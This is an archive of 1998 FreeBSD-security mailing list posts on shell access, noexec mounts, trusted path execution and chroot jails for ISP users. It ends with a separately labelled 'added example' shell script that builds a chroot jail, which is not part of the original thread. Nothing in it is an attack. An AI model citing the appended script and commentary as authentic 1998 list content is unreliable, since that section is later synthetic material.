* "The only reason I'm burning my candle at both ends, is  *
| that I haven't figured out how to light the middle yet." |
* fullermd@futuresouth.com             :-}  MAtthew Fuller *
| http://keystone.westminster.edu/~fullermd                |
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

From owner-freebsd-security Fri Aug 28 23:35:56 1998
From: scex
Date: Fri, 28 Aug 1998 23:29:23 -0700 (PDT)
To: "Jan B. Koum"
Cc: "Jeffrey J. Mountin", security@FreeBSD.ORG
Subject: Re: Shell history

> Hmm.. you are right, but what will stop an attacker who has
> freebsd box or has access to one to download the binary?

nothing at all, & this can explain why so many people are getting
'hacked'.. lower irreversible security, ie less limitations on what you
can do on the system to 'muck around' once you've owned a box.
securelevels should be & will be when finally developed properly barriers
on what you can do with a unix/whatever system. if o/s's ship out of the
box secure, in this case by segmenting privilege very thoroughly, there
will be "less to hack", & so disregard our development as thinking human
beings. or maybe i've had 8 cones too many.

anyway, as we can see from this little venture, you have to do better
than just stop people copying their own shell or making their own shell
if you want full 'big brother' ie sniffing/spying/monitoring whatever,
ways of doing this being trusted path execution & so on.

i'm kinda confused now so i'll just go chill on irc for a while, come
back & see if any of that made sense... (;

scex

From owner-freebsd-security Sat Aug 29 00:21:13 1998
From: Nicholas Charles Brawn
Date: Sat, 29 Aug 1998 17:19:49 +1000 (EST)
To: "Matthew D. Fuller"
Cc: "Jan B. Koum", scex, "Jeffrey J. Mountin", security@FreeBSD.ORG
Subject: Re: Shell history
In-Reply-To: <19980829012245.54585@futuresouth.com>

On Sat, 29 Aug 1998, Matthew D. Fuller wrote:

> On Fri, Aug 28, 1998 at 10:42:52PM -0700, Jan B. Koum woke me up to tell me:
> > Hmm.. you are right, but what will stop an attacker who has
> > freebsd box or has access to one to download the binary?
>
> mount -u -o noexec /home?
> (and /tmp, of course)
>

Or you could try my trusted path execution patch:

http://rabble.uow.edu.au/~nick/security/tpe.stable.diff

Of course, by that stage we're down to worrying about LD_LIBRARY_PATH
problems, and interpreters such as perl. :)

Nick

--
Email: ncb05@uow.edu.au - http://rabble.uow.edu.au/~nick
Key fingerprint = DE 30 33 D3 16 91 C8 8D  A7 F8 70 03 B7 77 1A 2A
"When in doubt, ask someone wiser than yourself..." -unknown

From owner-freebsd-security Sat Aug 29 00:27:17 1998
From: Andrew McNaughton
Reply-To: andrew@squiz.co.nz
Date: Sat, 29 Aug 1998 19:23:59 +1200 (NZST)
To: "Matthew D. Fuller"
Cc: "Jan B. Koum", scex, "Jeffrey J. Mountin", security@FreeBSD.ORG
Subject: Re: Shell history
In-Reply-To: <19980829012245.54585@futuresouth.com>

On Sat, 29 Aug 1998, Matthew D. Fuller wrote:

> On Fri, Aug 28, 1998 at 10:42:52PM -0700, Jan B. Koum woke me up to tell me:
> > Hmm.. you are right, but what will stop an attacker who has
> > freebsd box or has access to one to download the binary?
>
> mount -u -o noexec /home?
> (and /tmp, of course)

Does this stop an attacker doing something like loading a file as a
library from perl, using code on stdin?

Andrew

From owner-freebsd-security Sat Aug 29 01:37:46 1998
From: Vadim Kolontsov
Date: Sat, 29 Aug 1998 12:34:59 +0400
To: "Jan B. Koum", scex
Cc: "Jeffrey J. Mountin", security@FreeBSD.ORG
Subject: Re: Shell history
Message-ID: <19980829123459.B10707@tversu.ru>
In-Reply-To: from Jan B. Koum on Fri, Aug 28, 1998 at 10:42:52PM -0700

Hi,

On Fri, Aug 28, 1998 at 10:42:52PM -0700, Jan B. Koum wrote:
> Hmm.. you are right, but what will stop an attacker who has
> freebsd box or has access to one to download the binary?

tech@openbsd.org (mailing list) currently discusses "breaking binary
compatibility" issue..

Regards,
V.

--
Vadim Kolontsov                                  Tver Internet Center NOC

From owner-freebsd-security Sat Aug 29 03:24:38 1998
From: Heikki Suonsivu
Date: Sat, 29 Aug 1998 13:22:01 +0300 (EEST)
Message-ID: <13799.54857.992544.259013@katiska.clinet.fi>
To: Sean Kelly
Cc: john, freebsd-security@FreeBSD.ORG
Subject: Re: accounting.
In-Reply-To: <35E715A7.34C01A22@plutotech.com>
References: <199808281908.OAA16685@leonardo.cascss.unt.edu> <35E715A7.34C01A22@plutotech.com>
Organization: Clinet Ltd, Espoo, Finland

Sean Kelly writes:
> > > accounting_enable="YES"
> > But this doesn't seem to log the switches used for the program
>
> Yep ... that'd be a good feature!

Add pid and ppid. Without them it is non-trivial to see what, say, that
fingerd run "/bin/sh".

> --Sean

--
Heikki Suonsivu / Clinet Oy / Tekniikantie 12 / FI-02150 Espoo / FINLAND,
hsu@clinet.fi mobile +358-40-5519679 work +358-9-43542270 fax -4555276

From owner-freebsd-security Sat Aug 29 07:06:16 1998
From: Mike Holling
Date: Sat, 29 Aug 1998 10:01:25 -0400 (EDT)
To: Andrew McNaughton
Cc: "Matthew D. Fuller", "Jan B. Koum", scex, "Jeffrey J. Mountin", security@FreeBSD.ORG
Subject: Re: Shell history

> > On Fri, Aug 28, 1998 at 10:42:52PM -0700, Jan B. Koum woke me up to tell me:
> > > Hmm.. you are right, but what will stop an attacker who has
> > > freebsd box or has access to one to download the binary?
> >
> > mount -u -o noexec /home?
> > (and /tmp, of course)
>
> Does this stop an attacker doing something like loading a file as a
> library from perl, using code on stdin?

A sufficiently skilled attacker will probably always be able to get root
once they have shell access on a box. The key is to prevent them from
getting to that point in the first place.

- Mike

From owner-freebsd-security Sat Aug 29 09:20:26 1998
From: Paul Hart
Date: Sat, 29 Aug 1998 10:19:30 -0600 (MDT)
To: Mike Holling
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Shell history

On Sat, 29 Aug 1998, Mike Holling wrote:

> A sufficiently skilled attacker will probably always be able to get root
> once they have shell access on a box. The key is to prevent them from
> getting to that point in the first place.

That's a broad statement. I won't contest the fact that if users have
shell access you are now open to a much larger array of possible attacks
(like local SUID buffer overflow attacks and /tmp races), but saying that
they will always be able to get root is not an accurate statement.

Paul Hart

--
Paul Robert Hart        ><8> ><8> ><8>        Verio Web Hosting, Inc.
hart@iserver.com        ><8> ><8> ><8>        http://www.iserver.com/

From owner-freebsd-security Sat Aug 29 13:45:28 1998
From: "Jeffrey J. Mountin"
Date: Sat, 29 Aug 1998 15:38:14 -0500
To: Paul Hart
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Shell history
Message-Id: <3.0.3.32.19980829153814.0076e548@207.227.119.2>

At 10:19 AM 8/29/98 -0600, Paul Hart wrote:
>On Sat, 29 Aug 1998, Mike Holling wrote:
>
>> A sufficiently skilled attacker will probably always be able to get root
>> once they have shell access on a box. The key is to prevent them from
>> getting to that point in the first place.
>
>That's a broad statement. I won't contest the fact that if users have
>shell access you are now open to a much larger array of possible attacks
>(like local SUID buffer overflow attacks and /tmp races), but saying that
>they will always be able to get root is not an accurate statement.

Much discussion has passed before on the lists concerning the issues
brought up in this thread.

The best bet for ISP's is not to give shell access unless really needed.
Simple enough.

Now there are legit users that will want shell and my thought is to give
it. Add a surcharge (and live with the complaints) and work out how you
want to allow the shell access. I'd say it should be a "sacrifice" machine
that isn't running any essential services, has no special privileges to
other machines, and should be on its own segment of the network with
remote logging to a secured server. (web servers would need to be handled
a bit different, but there are more alternatives there)

The tricky part is how to deal with the shell access itself. Creating a
chroot environment would take some work, but once done simple to
duplicate, but it has been pointed out in the past that chroot has
weaknesses, as pointed out in several old threads. Has any work been done
to make chroot more absolute? Or is it the implementation of chroot?

The following is straightforward:

At 05:07 PM 12/31/97 +1100, Daniel O'Callaghan wrote:
>On Wed, 31 Dec 1997, Ernie Elu wrote:
>
>> I know it is not too hard to set up a virtual domain, website, and ftp site
>> for a client, but is it possible to have a restricted login?
>>
>> By that I mean if you have a freebsd system hosting www.xyz.com and the
>> client wants to be able to telnet in to hand edit files, is it possible to
>> restrict their access to only their home directory and its subdirectories?
>>
>> Sort of an automated chroot thing you can't bypass I guess.
>
>Build a chrooted area with /etc, /bin, /usr/bin, /usr/lib, /usr/libexec
>files which are necessary.
>Change inetd to run telnetd.sh and have telnetd.sh do:
>
>-----
>#!/bin/sh
>cd /newroot
>exec /usr/sbin/chroot . /usr/libexec/telnetd
>-----
>
>Danny

This means that there would be common area for all shell users and I'd
wonder if root would be restricted to console and ssh perhaps. As long as
there are no problems with someone escaping the chroot or affecting the
system outside this environment. This would be the solution.

It does add a bit of complexity and means that each user will take up
quite a bit more space, but they don't need every binary in the default
path. It would be easier to limit the impact than to try to fix every
flaw.

Jeff Mountin - Unix Systems TCP/IP networking
jeff@mountin.net
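An added example, not from the thread or from Danny's message, that carries out the "build a chrooted area" step the quoted telnetd.sh relies on: it creates the usual top-level directories, copies each listed binary into the jail together with the shared libraries ldd(1) reports for it, and writes a wrapper script in the style of the quoted one. The jail path, the binary list and all function names are assumptions made for the demonstration; the wrapper runs chroot(8) the way the quoted script does and still needs root to have any effect, and a jail built this way only limits what is reachable inside it, it does not by itself address the escape weaknesses the message refers to.

```shell
#!/bin/sh
# Added example (not part of the thread): populate a minimal chroot tree for
# a service binary and write a telnetd.sh-style wrapper. Jail location,
# binary list and function names are assumptions for the demonstration.

# copy_into_jail JAIL SRC -> copy SRC to JAIL/SRC, creating parent directories
# and preserving mode and timestamps. Symlinked sources are copied by content.
copy_into_jail() {
    jail=$1; src=$2
    mkdir -p "$jail$(dirname "$src")"
    cp -p "$src" "$jail$src"
}

# jail_libs BIN -> print the absolute paths of the shared objects ldd(1)
# reports for BIN, one per line. Static binaries and scripts print nothing.
jail_libs() {
    command -v ldd >/dev/null 2>&1 || return 0
    ldd "$1" 2>/dev/null | awk '{ for (i = 1; i <= NF; i++) if ($i ~ /^\//) print $i }'
}

# build_jail JAIL BIN... -> create JAIL with the directories Danny's message
# lists, install each BIN plus its libraries, and print how many files were
# installed. Libraries shared between binaries are copied once.
build_jail() {
    jail=$1; shift
    for d in bin etc lib usr/bin usr/lib usr/libexec tmp; do
        mkdir -p "$jail/$d"
    done
    count=0
    for bin in "$@"; do
        copy_into_jail "$jail" "$bin"
        count=$((count + 1))
        for lib in $(jail_libs "$bin"); do
            [ -e "$jail$lib" ] && continue
            copy_into_jail "$jail" "$lib"
            count=$((count + 1))
        done
    done
    chmod 1777 "$jail/tmp"   # sticky, world-writable, like the host /tmp
    printf '%s\n' "$count"
}

# write_jail_wrapper JAIL PROGRAM OUT -> write a wrapper script at OUT that
# changes into JAIL and replaces itself with PROGRAM under chroot(8), the
# pattern of the telnetd.sh quoted above. Prints OUT.
write_jail_wrapper() {
    jail=$1; prog=$2; out=$3
    {
        printf '#!/bin/sh\n'
        printf 'cd %s || exit 1\n' "$jail"
        printf 'exec /usr/sbin/chroot . %s\n' "$prog"
    } > "$out"
    chmod 755 "$out"
    printf '%s\n' "$out"
}

# Demonstration: a throwaway jail holding /bin/sh (assumed to exist on the
# host), plus a wrapper for a hypothetical /usr/libexec/telnetd inside it.
demo_jail=$(mktemp -d)
echo "installed $(build_jail "$demo_jail" /bin/sh) file(s) into $demo_jail"
echo "wrapper written to $(write_jail_wrapper "$demo_jail" /usr/libexec/telnetd "$demo_jail.sh")"
rm -rf "$demo_jail" "$demo_jail.sh"
```

For a real login jail the binary list would be the shell and the handful of tools the users actually need, plus a trimmed /etc (passwd without the host's hashes, group, resolv.conf), which is the "they don't need every binary in the default path" point made above; anything not copied in simply does not exist for the chrooted session.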